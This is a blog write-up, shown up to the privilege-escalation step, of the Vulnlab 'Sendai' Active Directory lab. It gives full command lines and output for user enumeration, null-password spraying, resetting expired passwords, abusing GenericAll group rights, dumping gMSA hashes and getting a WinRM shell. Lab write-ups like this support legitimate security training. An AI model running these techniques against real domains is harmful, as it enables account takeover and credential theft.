<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><title>Sendai - Vulnlab | serioton</title><meta name="author" content="serioton"><meta name="copyright" content="serioton"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="Sendai is a medium Active Directory machine from Vulnlab, created by xct. This box is a retiring hiring challenge offering multiple paths for exploitation. The path I’ve taken involves resetting a use">
<meta property="og:type" content="article">
<meta property="og:title" content="Sendai - Vulnlab">
<meta property="og:url" content="https://seriotonctf.github.io/2024/03/17/Sendai-Vulnlab/index.html">
<meta property="og:site_name" content="serioton">
<meta property="og:description" content="Sendai is a medium Active Directory machine from Vulnlab, created by xct. This box is a retiring hiring challenge offering multiple paths for exploitation. The path I’ve taken involves resetting a use">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wiki.vulnlab.com/~gitbook/image?url=https%3A%2F%2F3528174365-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FI3I73FFqB6GvT8N5Mt1N%252Fuploads%252FRRPTVaY8c7dGLUP6fFBH%252Fsendai_slide.png%3Falt%3Dmedia%26token%3Db35b5833-3b44-4447-8151-0357cc2440ea&width=768&dpr=4&quality=100&sign=d75b612a&sv=1">
<meta property="article:published_time" content="2024-03-17T17:13:40.000Z">
<meta property="article:modified_time" content="2025-02-13T13:39:15.123Z">
<meta property="article:author" content="serioton">
<meta property="article:tag" content="vulnlab">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wiki.vulnlab.com/~gitbook/image?url=https%3A%2F%2F3528174365-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FI3I73FFqB6GvT8N5Mt1N%252Fuploads%252FRRPTVaY8c7dGLUP6fFBH%252Fsendai_slide.png%3Falt%3Dmedia%26token%3Db35b5833-3b44-4447-8151-0357cc2440ea&width=768&dpr=4&quality=100&sign=d75b612a&sv=1"><link rel="shortcut icon" href="/img/iconcat.png"><link rel="canonical" href="https://seriotonctf.github.io/2024/03/17/Sendai-Vulnlab/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":false,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  }
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Sendai - Vulnlab',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2025-02-13 13:39:15'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = url => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      link.onload = () => resolve()
      link.onerror = () => reject()
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
          const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
          const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
          const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

          if (t === undefined) {
            if (isLightMode) activateLightMode()
            else if (isDarkMode) activateDarkMode()
            else if (isNotSpecified || hasNoSupport) {
              const now = new Date()
              const hour = now.getHours()
              const isNight = hour <= 6 || hour >= 18
              isNight ? activateDarkMode() : activateLightMode()
            }
            window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
              if (saveToLocal.get('theme') === undefined) {
                e.matches ? activateDarkMode() : activateLightMode()
              }
            })
          } else if (t === 'light') activateLightMode()
          else activateDarkMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/cat.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">33</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">10</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/camille-sule-bg-loulou-frames-00.jpg')"><nav id="nav"><span id="blog-info"><a href="/" title="serioton"><img class="site-icon" src="/img/cat.jpg"/><span class="site-name">serioton</span></a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search" href="javascript:void(0);"><i class="fas fa-search fa-fw"></i><span> Search</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Sendai - Vulnlab</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="fa-fw post-meta-icon far fa-calendar-alt"></i><span class="post-meta-label">Created</span><time datetime="2024-03-17T17:13:40.000Z" title="Created 2024-03-17 17:13:40">2024-03-17</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/writeups/">writeups</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>Sendai is a medium Active Directory machine from Vulnlab, created by xct. This box is a retiring hiring challenge offering multiple paths for exploitation. The path I’ve taken involves resetting a user password with <code>STATUS_PASSWORD_MUST_CHANGE</code> status, abusing GenericALL permissions, and reading the gMSA password. For privilege escalation, we exploit both ESC4 and ESC1.</p>
<h1 id="NMAP"><a href="#NMAP" class="headerlink" title="NMAP"></a>NMAP</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">PORT     STATE SERVICE</span><br><span class="line">53/tcp   open  domain</span><br><span class="line">80/tcp   open  http</span><br><span class="line">88/tcp   open  kerberos-sec</span><br><span class="line">135/tcp  open  msrpc</span><br><span class="line">139/tcp  open  netbios-ssn</span><br><span class="line">389/tcp  open  ldap</span><br><span class="line">443/tcp  open  https</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">464/tcp  open  kpasswd5</span><br><span class="line">593/tcp  open  http-rpc-epmap</span><br><span class="line">636/tcp  open  ldapssl</span><br><span class="line">3268/tcp open  globalcatLDAP</span><br><span class="line">3269/tcp open  globalcatLDAPssl</span><br><span class="line">3389/tcp open  ms-wbt-server</span><br></pre></td></tr></table></figure>
<p>From the Nmap scan, we can see that we are dealing with a Domain Controller, as indicated by the presence of DNS, Kerberos and LDAP.</p>
<h1 id="SMB"><a href="#SMB" class="headerlink" title="SMB"></a>SMB</h1><p>Let’s start by enumerating SMB using CrackMapExec</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  cme smb 10.10.79.192 -u &#x27;meow&#x27; -p &#x27;&#x27; --users --shares</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\meow:</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Enumerated shares</span><br><span class="line">SMB         10.10.79.192   445    DC               Share           Permissions     Remark</span><br><span class="line">SMB         10.10.79.192   445    DC               -----           -----------     ------</span><br><span class="line">SMB         10.10.79.192   445    DC               ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.10.79.192   445    DC               C$                              Default share</span><br><span class="line">SMB         10.10.79.192   445    DC               config</span><br><span class="line">SMB         10.10.79.192   445    DC               IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.10.79.192   445    DC               NETLOGON                        Logon server share</span><br><span class="line">SMB         10.10.79.192   445    DC                        READ            company share</span><br><span class="line">SMB         10.10.79.192   445    DC               SYSVOL                          Logon server share</span><br><span class="line">SMB         10.10.79.192   445    DC               Users           READ</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Trying to dump local users with SAMRPC protocol</span><br></pre></td></tr></table></figure>
<p>As shown, we can list shares with any user we enter and a null password. Let’s try to get a list of usernames using the <code>--rid-brute</code> flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">➜  cme smb 10.10.79.192 -u &#x27;meow&#x27; -p &#x27;&#x27; --rid-brute</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\meow:</span><br><span class="line">SMB         10.10.79.192   445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.10.79.192   445    DC               500: SENDAI\Administrator (SidTypeUser)</span><br><span class="line">SMB         10.10.79.192   445    DC               501: SENDAI\Guest (SidTypeUser)</span><br><span class="line">SMB         10.10.79.192   445    DC               502: SENDAI\krbtgt (SidTypeUser)</span><br><span class="line">[SNIP]</span><br><span class="line">SMB         10.10.79.192   445    DC               1107: SENDAI\staff (SidTypeGroup)</span><br><span class="line">SMB         10.10.79.192   445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)</span><br><span class="line">SMB         10.10.79.192   445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)</span><br><span class="line">SMB         10.10.79.192   445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)</span><br><span class="line">[SNIP]</span><br></pre></td></tr></table></figure>
<p>That worked, and we successfully got a list of all the users in the domain. Let’s get just the users and put them in a new file</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">➜  cat all.txt | cut -d &#x27;\&#x27; -f2 | awk &#x27;&#123;print $1&#125;&#x27; | tee users.txt</span><br><span class="line">Administrator</span><br><span class="line">sqlsvc</span><br><span class="line">websvc</span><br><span class="line">staff</span><br><span class="line">Dorothy.Jones</span><br><span class="line">Kerry.Robinson</span><br><span class="line">Naomi.Gardner</span><br><span class="line">Anthony.Smith</span><br><span class="line">Susan.Harper</span><br><span class="line">Stephen.Simpson</span><br><span class="line">Marie.Gallagher</span><br><span class="line">Kathleen.Kelly</span><br><span class="line">Norman.Baxter</span><br><span class="line">Jason.Brady</span><br><span class="line">Elliot.Yates</span><br><span class="line">[SNIP]</span><br></pre></td></tr></table></figure>
<p>We can attempt to spray a null password with this list of usernames</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  cme smb sendai.vl -u users.txt -p &#x27;&#x27; --continue-on-success</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">...</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\staff:</span><br><span class="line">...</span><br><span class="line">SMB         10.10.79.192   445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE</span><br><span class="line">...</span><br><span class="line">SMB         10.10.79.192   445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\ca-operators:</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\admsvc:</span><br><span class="line">...</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\support:</span><br></pre></td></tr></table></figure>
<h1 id="Password-Change"><a href="#Password-Change" class="headerlink" title="Password Change"></a>Password Change</h1><p>We notice something interesting, the users Elliot and Thomas both have <code>STATUS_PASSWORD_MUST_CHANGE</code>. A quick google search led us to this post here that explains how to reset the password <a target="_blank" rel="noopener" href="https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/">Resetting an Expired Password Remotely</a>. I also found this writeup very helpful <a target="_blank" rel="noopener" href="https://snovvcrash.rocks/2020/10/31/pretending-to-be-smbpasswd-with-impacket.html">Pretending to Be smbpasswd with impacket</a> because we can just use <code>impacket-smbpasswd</code> and set the new password. For this, we can use the following command:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  impacket-smbpasswd -newpass Passw0rd@ &#x27;Elliot.Yates&#x27;:@10.10.79.192</span><br><span class="line">Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">===============================================================================</span><br><span class="line">  Warning: This functionality will be deprecated in the next Impacket version</span><br><span class="line">===============================================================================</span><br><span class="line"></span><br><span class="line">Current SMB password:</span><br><span class="line">[!] Password is expired, trying to bind with a null session.</span><br><span class="line">[*] Password was changed successfully.</span><br></pre></td></tr></table></figure>
<p>Here, I set the password <code>Passw0rd@</code> for the user <code>Elliot.Yates</code>. If it asks for the current SMB password we can just press enter for a blank password. Now that we successfully reset Elliot’s password, we can enumerate further</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  cme smb sendai.vl -u Elliot.Yates -p &#x27;Passw0rd@&#x27; --shares</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.79.192   445    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@</span><br><span class="line">SMB         10.10.79.192   445    DC               [*] Enumerated shares</span><br><span class="line">SMB         10.10.79.192   445    DC               Share           Permissions     Remark</span><br><span class="line">SMB         10.10.79.192   445    DC               -----           -----------     ------</span><br><span class="line">SMB         10.10.79.192   445    DC               ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.10.79.192   445    DC               C$                              Default share</span><br><span class="line">SMB         10.10.79.192   445    DC               config          READ,WRITE</span><br><span class="line">SMB         10.10.79.192   445    DC               IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.10.79.192   445    DC               NETLOGON        READ            Logon server share</span><br><span class="line">SMB         10.10.79.192   445    DC                        READ,WRITE      company share</span><br><span class="line">SMB         10.10.79.192   445    DC               SYSVOL          READ            Logon server share</span><br><span class="line">SMB         10.10.79.192   445    DC               Users           READ</span><br></pre></td></tr></table></figure>
<p>Elliot has read and write access to the <code>config</code> share, let’s use <code>smbclient</code> to connect and explore it</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">➜  impacket-smbclient sendai.vl/&#x27;Elliot.Yates&#x27;:&#x27;Passw0rd@&#x27;@10.10.79.192</span><br><span class="line">Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">Type help for list of commands</span><br><span class="line"># shares</span><br><span class="line">ADMIN$</span><br><span class="line">C$</span><br><span class="line">config</span><br><span class="line">IPC$</span><br><span class="line">NETLOGON</span><br><span class="line">sendai</span><br><span class="line">SYSVOL</span><br><span class="line">Users</span><br><span class="line"># use config</span><br><span class="line"># ls</span><br><span class="line">drw-rw-rw-          0  Sat Mar 16 12:46:35 2024 .</span><br><span class="line">drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..</span><br><span class="line">-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig</span><br><span class="line"># get .sqlconfig</span><br><span class="line">#</span><br></pre></td></tr></table></figure>
<p>Great, we obtained the MSSQL credentials for the user <code>sqlsvc</code>. However, from the Nmap scan, we don’t see MSSQL</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  cat .sqlconfig</span><br><span class="line">Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=&lt;REDACTED&gt;;</span><br></pre></td></tr></table></figure>
<h1 id="GenericALL"><a href="#GenericALL" class="headerlink" title="GenericALL"></a>GenericALL</h1><p>Let’s use bloodhound to get a better view of the network and what permissions our user has. I prefer to use BloodHound from CrackMapExec since it was integrated</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  cme ldap sendai.vl -u &#x27;Elliot.Yates&#x27; -p &#x27;Passw0rd@&#x27; --bloodhound -ns 10.10.79.192 -c all</span><br></pre></td></tr></table></figure>
<p>From BloodHound we can see that our user Elliot is a member of the Support group, which has GenericAll privileges to the OU <a href="mailto:&#x41;&#x44;&#x4d;&#x53;&#86;&#67;&#x40;&#83;&#x45;&#x4e;&#x44;&#x41;&#x49;&#46;&#x56;&#76;">&#x41;&#x44;&#x4d;&#x53;&#86;&#67;&#x40;&#83;&#x45;&#x4e;&#x44;&#x41;&#x49;&#46;&#x56;&#76;</a>. So We can simply add our user to the ADMSVC group</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  net rpc group addmem &quot;ADMSVC&quot; Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl</span><br><span class="line">Password for [SENDAI.VL\Elliot.Yates]:</span><br></pre></td></tr></table></figure>
<h1 id="gMSA-Password"><a href="#gMSA-Password" class="headerlink" title="gMSA Password"></a>gMSA Password</h1><p>Now that we are a member of the <code>ADMSVC</code> group, we can retrieve the password for the GMSA MGTSVC, since MGTSVC is a Group Managed Service Account (the path is shown in BloodHound).<br>To do this, let’s use the <code>--gmsa</code> option in CrackMapExec</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  cme ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa</span><br><span class="line">SMB         10.10.79.192    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">LDAP        10.10.79.192    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@</span><br><span class="line">LDAP        10.10.79.192    636    DC               [*] Getting GMSA Passwords</span><br><span class="line">LDAP        10.10.79.192    636    DC               Account: mgtsvc$              NTLM: &lt;REDACTED&gt;</span><br></pre></td></tr></table></figure>
<p>Indeed, we were able to retrieve the NTLM of the <code>mgtsvc$</code> account. Another tool we can use to get the gMSA password is <a target="_blank" rel="noopener" href="https://github.com/micahvandeusen/gMSADumper">gMSADumper</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  python3 ~/tools/windows/gMSADumper/gMSADumper.py -u Elliot.Yates -p Passw0rd@ -d sendai.vl</span><br><span class="line">Users or groups who can read password for mgtsvc$:</span><br><span class="line"> &gt; admsvc</span><br><span class="line">mgtsvc$:::&lt;REDACTED&gt;</span><br><span class="line">mgtsvc$:aes256-cts-hmac-sha1-96:be5110d4326bd89ee62efc63fd14bb7f9694a03fe03be55ec567a6adb120b3bc</span><br><span class="line">mgtsvc$:aes128-cts-hmac-sha1-96:b99eaede7bb323c5a023dd6256feaf59</span><br></pre></td></tr></table></figure>
<p>Now that we have the NTLM hash, let’s connect via winrm</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  cme winrm sendai.vl -u &#x27;mgtsvc$&#x27; -H &lt;REDACTED&gt;</span><br><span class="line">SMB         10.10.79.192    5985   DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:sendai.vl)</span><br><span class="line">HTTP        10.10.79.192    5985   DC               [*] http://10.10.79.192:5985/wsman</span><br><span class="line">HTTP        10.10.79.192    5985   DC               [+] sendai.vl\mgtsvc$:&lt;REDACTED&gt; (Pwn3d!)</span><br></pre></td></tr></table></figure>
<p>We have obtained the user flag 🚩🐈</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  evil-winrm -i sendai.vl -u &#x27;mgtsvc$&#x27; -H &lt;REDACTED&gt;</span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line"></span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line"></span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line"></span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\mgtsvc$\Documents&gt; cat C:\user.txt</span><br><span class="line">VL&#123;REDACTED&#125;</span><br></pre></td></tr></table></figure>
<h1 id="PrivEsc"><a href="#PrivEsc" class="headerlink" title="PrivEsc"></a>PrivEsc</h1><p>Let’s start our enumeration by running the <code>PrivescCheck.ps1</code> script</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\temp&gt; upload PrivescCheck.ps1</span><br><span class="line"></span><br><span class="line">Info: Uploading /home/serioton/vulnlab/sendai/writeup/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1</span><br><span class="line"></span><br><span class="line"><span class="keyword">Data</span>: <span class="number">220672</span> bytes of <span class="number">220672</span> bytes copied</span><br><span class="line"></span><br><span class="line">Info: Upload successful!</span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\temp&gt;</span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\temp&gt; . .\PrivescCheck.ps1; <span class="built_in">Invoke-PrivescCheck</span></span><br></pre></td></tr></table></figure>
<p>It discovered the credentials of the user <code>clifford.davey</code></p>
